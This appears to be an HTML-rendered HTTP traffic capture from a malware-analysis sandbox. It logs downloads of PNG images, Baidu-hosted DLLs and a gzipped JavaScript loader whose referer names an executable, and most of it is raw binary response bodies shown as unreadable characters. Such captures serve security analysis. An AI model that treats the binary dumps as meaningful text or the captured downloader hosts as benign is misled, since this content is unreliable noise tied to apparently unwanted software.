Accept-Ranges: bytes<br><pre>.PNG........IHDR...X..........[l.....tEXtSoftware.Adobe ImageReadyq.e&<br>lt;....IDATx...i.e.u......[U.....=....ER.E..d..,...'..hp. ?.?...A.$?.$<br>...F.......#...pbG.c....J4R.Eq.I...o..y..{..{e.i.}..U]....M.X.W]u.....<br>.....o.?w?.......B.C.].}.o..... ......&.;..}...w..>.........k......<br>#......].....:.....S.1.0....n..ML..._.......n.. .E.....\........@.....<br>.......O..".....:?...~$.....O......0...s]~u...o.s.yz....5x}..m.;.O5.gB<br>...Sy.|sz.....{..n.......i}A.....@N..|~&>.(..... ^..|.s.%.?,o.{....<br>U.......&/....8.i.8..?S..V&~.q.......B.W...._....w.C......._...~..)...<br>.l...1..<.c..@(......r.WU...G...?R.G.'-..c0....&g..A. _..n<..s\.<br>.p....:A.o.H..!....H'..(...<b^.......N.@....|[email protected]..<br>z.......B.....\.WIG..yH...[.W..;.6.W.N.....N7...O"..b.-....vw..[>..<br>s~o...vv.b...6F~.u..a....'k...d...;=P.8./|.....o|...t}...OY..p.SS.....<br>.QV/.7..KYs......yx.m.?.m....@`s...r..../...~.?.F...gx# ...(.........P<br>.L..`..Oy.U.....[....Q.L.(..../!........(/..q..."z...)....-........T..<br>..g.J...'=........][email protected].<:. ...T"........F.e...`J..}...<br>......w....I.?..(...._...:S......Q........o.i.@.=I8.G..<.. 4..sx a:<br>..K......K.Q.(....N......Y...|......I.rF.$..Bl;$.d.......!:(.....v#...<br>.r|9...I.>.!F.Bt.....vD..?..<..%....G.[..o.rb...&....^(9#..M(...<br>...!,....?k.^r..]........<?/:.!....]..-.!....'......,....._.....Xa.<br>5.HQ3...M.e.......Y.eH.,x.'.:...8...NX......p.....<........5.l..d..<br>.....o....\E..U.....{6(...d....2....._9........b..,5.?.\qv..P.g..N.S..<br>.......rAk|Z.$.....|r$Og`........m.6......w...<*....g.64.C.fFZ.</pre><<< skipped >>></font><br><br><font color="red">GET /tg_pic/2.png HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: img001.com<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:25:34 GMT<br>

Content-Type: image/png<br>

Content-Length: 160224<br>

Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>

Connection: keep-alive<br>

Accept-Ranges: bytes<br><pre>.PNG........IHDR...X..........[l.....tEXtSoftware.Adobe ImageReadyq.e&<br>lt;..q.IDATx...i...Y...o.{.s...^.[j.DK-. !a.R`H.F...lH.q...$..?\vf;U..<br>bR....$..R.\[email protected]..{..Z .......U....{.........}.<br>........w.....4ZJ/..B.)v.<.g../g..../E....[*._pC(...ny....Z....0R..<br>..&<Q.......[.?...G.....8..>..n..G...._.|..'i...6....J.....7..-Z<br>z...V.7>..W..B...o..!....p...?....\.n1a..v..D.......Q.]h.e.,.d.v.;.<br>?..=Z.c...{>p.<..?~h...7;~|._M....I<.tC...6 .,:pBk...3 .a.j..<br>aka..W....i..l..g....__..t......>D.p#D..&.Q.......i.&;......0..0n..<br>.........5.o.........qt.4........C............/....>....W...... .p.<br>.KQ)..1.. SUMm..Y.M.l....j...]:Z........],...nZ...B.....>.....#.S..<br>7......;g...w.....=.}..l.....!..m..Z...U..wY.,WG...2.I.lL..&..Q.=T..iC<br>r<....h..j.{3.......xuC.Y..#s..W....eX...XKQL...3....~v.Q."...;.'..<br>..9.c....l...k..<.re.4....p.L....?.......`.kUU...%.E...GZ......^...<br>..C......>>[email protected].<br>.##\.(H.q.....Wz.o....^[email protected]...<br>.5L..n.=....c........n.......<.......P. p....w.4....$...~.....' ..)<br>....  .{8ay%[email protected].<:>:=_]Z.....G..c...m.....<br>..J..&.....q.^.n[.\..Q...yS.{...1...|....}. X....c.uo....>...I.^3..<br>.r...(....... =.^.0WQ~.......GV!/.X..T.3E...j...@ .(r%....D ....$...F(<br>.?.GH.!."..V.E...\..J.s......h.Q...."x..t.O.=..._SF.D.<.`.-T.M.|..I<br>J..w.o*.=.i...........V#/[email protected]..)..S..a.....(.4"|.O`.pD<br>vQP3.._.PP3.Jb.3.|...... `....`f.........q.H`?N.../`@@.q....=|.=..</pre><<< skipped >>></font><br><br><font color="red">GET /tg_pic/3.png HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: img001.com<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:25:36 GMT<br>

Content-Type: image/png<br>

Content-Length: 149164<br>

Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>

Connection: keep-alive<br>

Accept-Ranges: bytes<br><pre>.PNG........IHDR...X..........[l.....tEXtSoftware.Adobe ImageReadyq.e&<br>lt;..FNIDATx.....mWY&:..vs...777.MB:.i [email protected].. ...(.|.W...U".W<br>2D...U.R)[email protected]..>.47.9..{.5.....s.n......67w...}v........<br>...../|......>.......p.9...z..[~..'......._BIz......C......h...M9.m<br>._x.......c.o...f.>[....&E...x....8.........&.J.~.....  ..a..Oz....<br>..)5..Rx......cR...{:.$.@'C.... .S.He.......a7.....1........*........C<br>U_....M.WJv\....k......r....[M...........-.!.q...c'c....I?..u.p.#.....<br>.>...8t..r....az.....h.f.@u".........?..........|....e81..TG....^..<br>E.q....E.:........;....W..^[email protected]..?.g.{.NH......... ..pr.].&g<br>t;..n..M...o...PJY#...........x..@.......&.3.=...zKv.m...]...5yO.C..0.<br>....8.P.8G...S..g.P.e.....B.,._. ]4......Q7..W.\.......4.q..Y6.F4.K6.K<br>F.#t.. .4J86.vB-.c...M.V..J'`.wF:....Fa............ ....C`[email protected]<br>...N.DF.....4.f........ G...;...0..I.....J......*....(.......3....s...<br>..W..}.'.....!.!g.'...U;j..9..]c%.....v]..p...2.g.h{...m(...Z..r..i.J1<br>.. F-......f.B'.!P...h..........\*.p.>...Q..C.4:P?..@..?...J...\..C<br>...T9.....#. ......OQ....L..w.b....Iu..O..m...}./.....(x&...........D#<br>.3u( k>.6PD..!P7.......t.e..... ..S.|..z.{Ft.,.O@Fgj.!..........%..<br>.S....M./..e,d7)~._dl.........}p.j.9..R$...a.H.S..(SA%eI....f.D/.{.%{}<br>.o...y/.. J.i.ur..fAp.3[...,M........d`...|........O.s....9..G..m.Q.|.<br>l,m. .pGF.._.HE..SKY..B..n.?R......<....!O...1..l...2V......pe.%B..<br>%......X....!^..[!.(>.}...#C...0......O.E.~Q.B...)9G.}&.]pCG2X.R*R8<br>s.A...B...q:...y.........=.o.......tp;..3.........z86j.d..0.RT*...</pre><<< skipped >>></font><br><br><font color="red">GET /tg_pic/4.png HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: img001.com<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:25:38 GMT<br>

Content-Type: image/png<br>

Content-Length: 156314<br>

Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>

Connection: keep-alive<br>

Accept-Ranges: bytes<br><pre>.PNG........IHDR...X..........[l.....tEXtSoftware.Adobe ImageReadyq.e&<br>lt;..b<IDATx......Yv.v.....^.....M.L.G3.M..1H..%....a#.da#,.-#/..cp<br>[email protected]. 41........6..~..-.g...{}.s......z.u.(.....&  .?..~<br>.;.;...J}.7....J)....?.9.i.-.3.#....x.<...O.z.T.v.Fo...>....^yb|<br>3z.. <E.'....F..-x.7..Y!,=..J....o.............N..<.~.#^.O....*.<br>..V._....9A..=........fB..>....C.....t....M...w...j.8_7....8|...n.W<br>V.^...y0=m3....t...Xe.6.1F.?M...O.:4........%.shC...7.ih.\...M.-..U.].<br>..UE....i.P..)B]..bW)_ .....z.(k,m...,..^/....(....Z......kgr.3\.G..?.<br>.#..M.3Yf2zm./...Oe.|.....Y.9-..x../.a..>..t@....;z....{...W.E..8..<br>|....)@.s.......nj~.......x....;..([.z...;_...Y.#[email protected].<br>>.....u].t....k.}l.m.m.m......-...$.....7..,.....Y:..`...e.f.#.....<br>......./;....r...Jgl.^......Y.im....I.N....:.z.~...r....!......z......<br>..o.......9.T....s....[8f....}X._0..n..7;.^)s...k.*...n.......Z..[....<br>F..........Z:.. h.@}.....ZP7.......&......w../B.-..`z........A=...&u.k<br>..fuG.U.?.wxc.C......t...Kh.k.VJ. .g[.h..m.K...Z.C.......M...-.....@z.<br>.B\[email protected]..?...y.S.....B.`.@. -7...*c.-^!..(....2G..6.6>.%.R`!..<br>.X.W..tzE ..pV..l.......{.......E...7........I_&..1....ZA.t#.b,k.=0...<br>Zd.8T...o0............#(..m.xh....}..A...b..Q!N#...-...,...5X.........<br>..|#C.....0F!..N...8..<...0..=.e.h#....b.g.b.8{.....,.4....We.!.z..<br>y......@Fv~.}.......x..\..6;.[.C9/a...m.!"[email protected].=f.<br>58.....I.x*......9.9.....E\ej~.....6qpu#..p..p.......4...U,..'u....k.7<br>...B.tk...{...v..*...6./#.OY....r:Gk.....%O/`aha..'~)....!m....q..</pre><<< skipped >>></font><br><br><font color="red">GET /tg_pic/5.png HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: img001.com<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:25:40 GMT<br>

Content-Type: image/png<br>

Content-Length: 164337<br>

Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>

Connection: keep-alive<br>

Accept-Ranges: bytes<br><pre>.PNG........IHDR...X..........[l.....tEXtSoftware.Adobe ImageReadyq.e&<br>lt;....IDATx...i.e.U...>....sVfe..(...$1.,,......M..........#pC.0..<br>...`..6.f....AC..X.JCU.........7...{..kOg.s.}.eVf)...^....{.=g.}......<br>.|.|...?......... ...Ah ....s..Y.H^.. b......7.o..<;...l...I..W.[&g<br>t;..........<Oy....H.y6...g)c..x..P..A..A...'.@./_.4...H.m..S......<br>.@ _.-.....?r.T.:[email protected]..`..Gb2..M>..t[dC.r...#..4nA."Q......b~..<br>@LhHh$.*.I~..G .........{w...N......._.8..Q0&.dz..P.9.AQ3...j...3s....<br>......)p....?......../.I.x.\..,...K.......72x.....QQ3L..p.g...3.....&.<br>.....E....?......zP...}b.'.J.KX....U.{....si..=....C.ra...8 8.7..m.T..<br>........n.....2.K3...j..Loy..r..;....w ~...........s=..f1.....D..P<<br>....V...{7.5S.E!p.T.....Xq\E... .:S9&....6.z.h..PNC....D.....}'..;.f.|<br>..../4WQ..../....7....:.g.....l.T'.G...........L.7..P.?n.M..BP... ..J.<br>. .?.0....U..Y.yi^u..ZE...%...8-'\.......g.....!......B-].....<x}.\<br>..*.o.k6.z..F:{qu7.p.....#.I.B.O.g:..B.....zGx?p.).....!.. z(.V.Z(TC..<br>x....)....J...../...>.].K..x.....L..{.v.G..D. p3..d7..... .p$....Z:<br>}.l.K.Z.(.R.N....ja.....n.aW...Q].._.3..ZT..=..`@mA..ki/......p.h..e.X<br>.p.BK ..............;]!."..A1.......%[email protected]\"..... ..4.p...?tk..R..!<br>!..k...\\&.r.O....$(W..U...x....b'..mR.T-B....XhT..{..-.3........P.v\.<br>H.>...7..;.........3".J..34....."...I0...#. .......La.S....V(\'...c<br>...{.X..}..Y.....=.`.....= ..a.|y..a..`r/....]$.....5....ah..m&0.il.ij<br>._..........W.l.Lf....@..`...v.,,..]......_..&M o.7....O.....S.b...w..<br>_P&.U...m...#..*..DA5(..x.o.<...Z..F........d{....f......UtP""2</pre><<< skipped >>></font><br><br><font color="red">GET /tg_pic/mobo14-1-9.png HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: img001.com<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:25:41 GMT<br>

Content-Type: image/png<br>

Content-Length: 132296<br>

Last-Modified: Mon, 06 Jan 2014 08:23:44 GMT<br>

Connection: keep-alive<br>

Accept-Ranges: bytes<br><pre>.PNG........IHDR...X..........[l.....tEXtSoftware.Adobe ImageReadyq.e&<br>lt;...jIDATx.....$.v..;2.t....{)^.2%K6d..l.4..........C...2..2e...;3=.<br>..........Y.{.3.s.UY.............o..R."......(_...._..X...5.......Kz.b<br>...J?B.jG..E..?F..........b..R..t.?..?.~o.....O?.>.._/...~..\..k]..<br>e.........b. ......./.. ]u....J~Yp....."g.O...^ZZ.Q..Q....?......G.I~"<br>.sH.Z..........!..Q...}<....y..,.....%.~k..H.W.....5.R..-.<. .Pz<br>i_'..}..{....S.....v..?}.....~.....r)O.....^`.../.....h.........S._..k<br>G.,^.......{.W.];...vs.o...7....f....[ie..W.)U_..P.>./..m..r.Z..S.k<br>..ok...*n{.". .B'.k...v.,>...... .....;.t.g.....F.U....z)e.g.7..o..<br>]......{.4.G.{....../OeyW..~....C.....z...w>b)..U....._M..]`?}j.t.C<br>.[.?..E..M.'.....Q...>........ .}4.M....o7......u._.]TxI...Z.-.6...<br>Y.^Z... ......K....J...P..Sn.]-...kX>8.\zX./......N..|.G.P.X7<..<br>..... ^I.."..d0yW.>n..X.n.F.u..0.}b.Z...._.|...J2j.../=}=........G.<br>......(.....|..u.h_.g~1.....5jlry...TZ....y .Ptgl.,nr.....q..m..m.n...<br>r... ]#_C..~ -J.....m....M6...B..OkB...yv7...&geo.7..m@~...z...=mS.U.b<br>t.....x...e.(zo_a.~..Y...o2....V0]M.7.~...y..i............?l6,t.(..O.&<br>lt;.x.|z).(....G7?.....V..$..~..o......-..4y.E_.......5^....&.....v1Sv<br>V......C........n.x._Z.9.=Vd.I.E.5. .7H..6{@..|... ... .....B..v..Z.7r<br>.8.......-0.._.......0EB.}...%j.|.t}.z.....Mc..>.69.........Z..b...<br>K.?M...a...j...]..c..v..Z.w6.C.Mhb@Q]/.5.{![..#@z..[$l..|.....]."...S.<br>. ...{...x.n.....U.}Fh..(9........T...*..._<.x.G.J..c.....gp.....~.<br>n.0YU.n...IB.D......p..9..%i...7......j.).......f]..*eG..I...~..Y.</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllv3/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=753664-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 16:01:04 GMT<br>

Date: Sun, 10 Aug 2014 16:01:04 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Mon, 17 Jun 2013 13:07:38 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 753664-1207519/1207520<br>

Content-Length: 453856<br>

Age: 555567<br>

Via: 1.0 sdytwt88:88 (Cdn Cache Server V2.0), 1.0 tswt76:8104 (Cdn Cache Server V2.0), 1.0 jg13:10003 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>..................D$.,0..:........................D$.,0..:............<br>...........D$.<0|.<9~.<a|.<f~.,A<.w.......3............<br>....D$.<a|.<z~.<A|.<Z~.<_t.3........................D$.<br><a|.<z~.<A|.<Z~.<0|.<9~.<_t.3................D$.&<br>lt;at <bt'<ft#<nt.<rt.<tt.<vt.<\t.<?t.<'t.&<br>lt;"t.3................D$.....0...w......0.....a...w......W.....A...w.<br>.....7............D$......Tw,........$...........................\..'.<br>."..?.................{...~...........................................<br>......................................................................<br>................8...............A`,0..:........A`<a|.<z~.<A|.<br><Z~.<_t.3..........A`,...:[email protected]...............<br>.V...~..r..F.P..`.....3..F......F..F.^...........j.h32..d.....PQSVW..v<br>..3.P.D$.d........t$..Fh.Vl;..D$.....~..NX.9 .P.G....~H.r..N4Q.._.....<br>3.......~H.^D.^4.~..r..V.R.}_......~..^..^..L$.d......Y_^[...........j<br>.h.2..d.....P..\SUVW..v..3.P.D$pd.......$....3......3..\$.9W.r..G....G<br>..80.D$..D$ ....u".H...xt...Xt..D$ ..........T$ .D$......l$$.l$(u7..$.<br>....L$$.T$(...P....L$pd......Y_^][..h..\$...$....3.....0...w......0.'.<br>...a...w......W......A...w......7.....;.|.;t$ |h.T$,WR.D$............h<br>N...ht......j..L$T..$.....\$$..4..W...h........$.........\$ ..8......8<br>..P.L$...C......l$xt.....L$H.\$..|4......D$x....t.....|$D..\$.r..D$0P.<br>.].......$.........;...wkr.;.$....w`.D$ .....$....W ...V..QR......L$(;<br>.w;r.9D$$w3.D$$QPWV........D$$.D$.......D$......T$(.......`...2..L</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=1081344-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 02 Sep 2014 13:53:19 GMT<br>

Date: Sun, 03 Aug 2014 13:53:19 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 1081344-1207519/1207520<br>

Content-Length: 126176<br>

Age: 1168032<br>

Via: 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>HTTP/1.0 206 Partial Content..Expires: Tue, 02 Sep 2014 13:53:19 GMT..<br>Date: Sun, 03 Aug 2014 13:53:19 GMT..Server: nginx..Content-Type: appl<br>ication/octet-stream..Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT..Ca<br>che-Control: max-age=2592000..Accept-Ranges: bytes..Content-Range: byt<br>es 1081344-1207519/1207520..Content-Length: 126176..Age: 1168032..Via:<br> 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Serv<br>er V2.0)..Connection: close..Content-Disposition: attachment;filename=<br>"BDMReport.dll"..Access-Control-Allow-Origin: *..Access-Control-Allow-<br>Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD...... ...@...`..............<br>.........0...P...p...............0...P...p................... ...[....<br>...........<...k............... ...[...........................t...<br>....C...............w...6...................K...................H...x.<br>..............F...{...............8...p...........3...............6...<br>y...........9...h...............................H...........2...v...u.<br>..g...........l.......Y...................;...k...............(...X...<br>........9...........[...........9...s...........9...y...........(...X.<br>..............#...S...............#...^...............)...i...........<br>....8...h.......X...................@...y...........9...y...........9.<br>..y...........9...y...........9...y...........9...y...............8...<br>`...................@...{...............;...k...........I.............<br>..H...............(...i............... ...i............... ...X.......<br>............H...{...............C...k............... ...X.........</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=622592-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:20 GMT<br>

Date: Sun, 10 Aug 2014 15:52:20 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 622592-924495/924496<br>

Content-Length: 301904<br>

Age: 556088<br>

Via: 1.0 hzh64:8104 (Cdn Cache Server V2.0), 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 jg9:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>.du.f.> u........~.f.>0.D$..t..D$..3....D$4.D$8.D$<[email protected]$D.D<br>$H.D$L.D$P.D$T.D$0%........t.f.D$2 .......|$..t.f.DD00....3.;.~.f.DD0*<br>................t~f.DD0I....f.DD06....f.DD04....f.lD0...f.TD0..;..Q.R.<br>.....L$4P~ WQ..$..........l$,......L$ .....Q..$..........l$(......L$ .<br>....f.lD0...;.f.TD0.....~'..RW.D$8P..$..........l$(......L$ .s.....Q.T<br>$4R..$.....|....l$$......L$ .M......w].$.......Ph,..........$.....E...<br>....8..Qh4......Q...RPh<......Q...RPhH..........$..............$...<br>.Q.\$|3..t$4.q......h......$....R..P..$....Qj.h..............K....l$..<br>.$....f..$.....L$ ........t3...t..A...h......$....RPQ..`....l$...$....<br>.L$ .P.....h......$....R.RP..`....l$...$.....L$ .$......t3...t..Q.h...<br>...$....P..RP..t....l$...$.....L$ .......h......$....R.RP..t....l$...$<br>.....L$ .......V.f..1.....r.f..6w......0...t0...t P..Ph......$....Q..p<br>....l$...$.....L$ .p.....PRh......$....P..p....l$...$.....L$ .E...;.u.<br>.T.....F..N....f=*.u..V.R.......$........*..f=0.r.f=9.w.Q.............<br>........J.."...........$......L$.3....D$4.D$8.D$<[email protected]$D.D$H.D$L.D<br>$P.D$T.D$0%........~.f.D$2*........|.f.DD0.....f.DD0*......f.TD0~w....<br>....~...... ..L$...$................$.......$....|[email protected]$0...<br>...L$ .!...P.D$<P.3....l$,..$........L$ .......$................$.D<br>$8.......$....|.UP......l$,......L$ .....P......l$(..$........L$ .....<br>..$..............$hX..........$............V..$....Pj...Qj.h......$...<br>.......$..............$hX..........$.....M........|/.L$xQ..$.......t$4<br>........h......$....R..P..Q..h......$....Rj...$....Pj.h...........</pre><<< skipped >>></font><br><br

<font color="red">GET /support/mini/fyminiloader-min.js HTTP/1.1<br>

Accept: */*<br>

Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: static.m0dlcdn.kukuplay.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Content-Type: application/x-javascript<br>

Last-Modified: Fri, 11 Jan 2013 07:55:33 GMT<br>

Expires: Thu, 31 Dec 2037 23:55:55 GMT<br>

Cache-Control: max-age=315360000<br>

Content-Encoding: gzip<br>

X-Via-Cache: sx<br>

Content-Length: 363<br>

Accept-Ranges: bytes<br>

Date: Sun, 17 Aug 2014 02:21:50 GMT<br>

X-Varnish: 697734456 662675323<br>

Age: 3427941<br>

Via: 1.1 varnish<br>

Connection: keep-alive<br>

X-cdn: sxcdn<br>

X-hit-at: server5.sx<br><pre>..........}Q]O.0.. .&.f..l..:...MtO..........$.wK...}:...s...U.J.B4t..<br>9f..5W6..>W|.O.W... ...j]K%..!g..I.....!x.&>..s......>.0H~..s<br>.no...>....L.....@&.....>.*:....J.h....97K.....h.....B.&..o$x.5*<br>..........tQc[)Z..d......l....g.h.X].A,.g.8N7(08.............xZ....1".<br>k.....,m... ...T3..X. .G..K..q.q...` .._-..q.a....]UR..........~<\.<br>L......A.GR)n^>..p1..e.B.......HTTP/1.1 200 OK..Content-Type: appli<br>cation/x-javascript..Last-Modified: Fri, 11 Jan 2013 07:55:33 GMT..Exp<br>ires: Thu, 31 Dec 2037 23:55:55 GMT..Cache-Control: max-age=315360000.<br>.Content-Encoding: gzip..X-Via-Cache: sx..Content-Length: 363..Accept-<br>Ranges: bytes..Date: Sun, 17 Aug 2014 02:21:50 GMT..X-Varnish: 6977344<br>56 662675323..Age: 3427941..Via: 1.1 varnish..Connection: keep-alive..<br>X-cdn: sxcdn..X-hit-at: server5.sx............}Q]O.0.. .&.f..l..:...Mt<br>O..........$.wK...}:...s...U.J.B4t..9f..5W6..>W|.O.W... ...j]K%..!g<br>..I.....!x.&>..s......>.0H~..s.no...>....L.....@&.....>.*:<br>....J.h....97K.....h.....B.&..o$x.5*..........tQc[)Z..d......l....g.h.<br>X].A,.g.8N7(08.............xZ....1".k.....,m... ...T3..X. .G..K..q.q..<br>.` .._-..q.a....]UR..........~<\.L......A.GR)n^>..p1..e.B.......<br>..</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=6553600-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:40 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 19450704<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127201<br>

Content-Range: bytes 6553600-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>/.../*.....zz|{.G.4.......|..L.H.!x;.q..}..B.....j3? .........(.... .Q<br>.......${[email protected].&9 .....G...4p....\..m.!.jn.tV.........G...u.<br>4.-...5...Ed...H.J.UM.\>....4d./Ek./.|.Rb.F.|.5-"..;.C..(........?.<br>.8..vb5.H..`..M..9..j#./.:h..w..B..6>}.:u.N. ...S..m..3.PC.... ....<br>t.n-z...2x.H7....p...*.....T......._..7h.......)..{.(..m.I.......Hk...<br>2.]~V..x`.[.>).EAU.....hL..zme..oa...8...M.Be-o..t0...}.D.p...v..](<br>.....w..F...?...~C\......9..g.t.k6@~.).=...Y....mtz.......=...e.......<br>.x......2....8*...."....4..-.F..".i.#......!a...H..."k..X.5.,.~>U].<br>Q#.BgM..H...|.k..Z..2r$.k.1....@[email protected].;..Q.d'|.}[...!..x.&.<br>H...l...fH!r....d-.'@Y!He.a..;.....F........=/).....'Fv..f./..U..=.M..<br>#.%..pf.=...G3.g._W..YL.S.$..H....4......B.J..(K..p<HfJvz.7.z...IA.<br>..c....X.#{ ..! ]z.R.z?.....A.Ws...u.........'Z..QQp.}.H.V..W.%.w..{p3<br>Co.gg*...i.../.....9"..../.rM.D@...."S.......&6N....>..%cW.......&g<br>t;.......>./..t.Dy_.zWB..-8.....}!.g.pt5.YzF.\..E.......d.ZU.}0...-<br>X2.r..>....^).fO......u.dxY.nTT... -...]#5.{.7!..Y..d.GJ.....3.....<br>......!..z.,D...C..G.2..".k#...9.>j..4a|.h.tf.MH$.].5.k.k..L.@...).<br>...H..U..cK/.. ..lx(/.*P.43e..EXk.2..n<3.l}W. .....Yu.C...VOBi..8-.<br>....'.*.w..$.:$......l^[email protected]^F..#,nnNg.<br>[email protected]:...4/.p7..VS.k.j.Rmb8.. sM.8....U...6H*......2..<br>.........\..m.....#....6.l{..FE.*.ld......Lm..s...L .Q.V.;...Q...B2^.e<br>...E..>{...<R...x..x`.....w4...~])p.......R.<..F...g.....T..`<br>.[n.-.:v..iQ[!....MG...N..z....,...w/./c.x..K.........}....2...').</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

